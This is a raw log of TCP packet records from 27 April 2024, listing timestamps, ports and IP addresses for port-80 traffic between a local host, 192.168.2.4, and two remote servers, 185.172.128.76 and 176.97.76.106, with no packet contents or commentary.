Apr 27, 2024 02:19:24.168523073 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.168689013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.168766022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.223001003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.261284113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.261516094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.261559010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.261574030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.261629105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.277726889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.284698009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.285482883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.285548925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.285559893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.285645962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.285706997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.285718918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.313492060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.313628912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.338944912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.338968039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.339189053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.339931011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.340007067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.340013981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.340046883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.340080023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.340117931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.432127953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.432147026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.432161093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.432360888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.472909927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.473241091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.473320007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.480813026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.480937004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.480992079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.481003046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.481056929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.481123924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.485554934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.485793114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.512304068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.512383938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.512398005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.512465954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.512484074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.512558937 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.534775019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.534852982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.534909010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.534909964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.590213060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.603063107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.603111029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.603159904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.603214025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.657366037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.657386065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.657438040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.657484055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.669775009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.669835091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.669888973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.677433014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.677468061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.677500963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.677530050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.677670956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.677684069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.677715063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.683448076 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.683490038 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.683501959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.683506012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.683563948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.683583021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.730818987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.730822086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.730942965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.730998993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.786413908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.833283901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.833301067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.833378077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.833378077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.840193033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.859555006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.859637022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.859834909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.859850883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.859863997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:24.859918118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.859949112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:24.864835978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.864942074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.865016937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.874699116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.874833107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.874856949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.874890089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.874979019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.875086069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.928522110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.928536892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.928642988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:24.928760052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:24.980977058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.005297899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.005347967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.005420923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.005479097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.032083988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.032133102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.032210112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.032275915 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.035651922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.061621904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.061664104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.061721087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.070900917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.070915937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.070931911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.070971012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.071033001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.124887943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.124929905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.125078917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.125078917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.176203012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.176357985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.176810980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.176892996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.203469992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.203532934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.203533888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.203547001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.203562975 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.203608990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.203643084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.255749941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.255764008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.255836964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.265523911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.265563965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.265579939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.265593052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.265593052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.265661955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.319530964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.319583893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.319606066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.319669962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.347601891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.347687006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.371244907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.371373892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.375658989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.375673056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.375725985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.375760078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.375791073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.375847101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.375880003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.461064100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.461078882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.461158991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.461163998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.461251974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.461308002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.515786886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.515820980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.515875101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.523571014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.523648977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.547632933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.547648907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.547662020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.547674894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.547693968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.547758102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.547789097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.567040920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.597805023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.597872019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.621436119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.656276941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.656301022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.656445026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.656502962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.656583071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.656646967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.656658888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.696460009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.696651936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.699544907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.712018967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.712097883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.712260008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.718575954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.718631029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.718676090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.718724012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.769675016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.769768000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.817363024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.817405939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.817603111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.852497101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.852516890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.852576971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.853384972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.853439093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.853507996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.868350029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.868424892 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.892174959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.892190933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.892366886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.892366886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.895960093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.909008980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.909027100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:25.909050941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:25.940362930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:25.940423012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:25.949567080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.017010927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.017024994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.017081022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.047821045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.047888994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.047938108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.048041105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.048721075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.048779964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.048804045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.090264082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.103866100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.104010105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.104084015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.111026049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:26.111181021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:26.143610001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.199714899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.211422920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.211509943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.211659908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.243499041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.243707895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.243872881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.244436979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.244582891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.244625092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.285993099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.299426079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.299475908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.299509048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.340293884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.396300077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.407733917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.407783985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.407871008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.439790010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.439935923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.439946890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.440462112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.440516949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.440608978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.480910063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.495095015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.495230913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.495307922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.536753893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.590176105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.603293896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.603342056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.603419065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.635199070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.635344982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.635534048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.635565996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.635581970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.635639906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.676554918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.691085100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.691097975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.691250086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.786206961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.799724102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.799738884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.799786091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.831311941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.831326008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.831383944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.831402063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.831446886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.831492901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.831547022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.831595898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.887506008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.887658119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.887728930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.887742043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.949690104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:26.995270967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.995471954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:26.995548964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.027853012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.027872086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.027924061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.027936935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.027967930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.027982950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.028049946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.028049946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.028049946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.065717936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:27.065792084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:27.083625078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.083731890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.083790064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.145097017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.190735102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.190825939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.190967083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.193612099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:27.223779917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.223794937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.223829985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.223870993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:27.223901987 CEST	80	49734	176.97.76.106	192.168.2.4
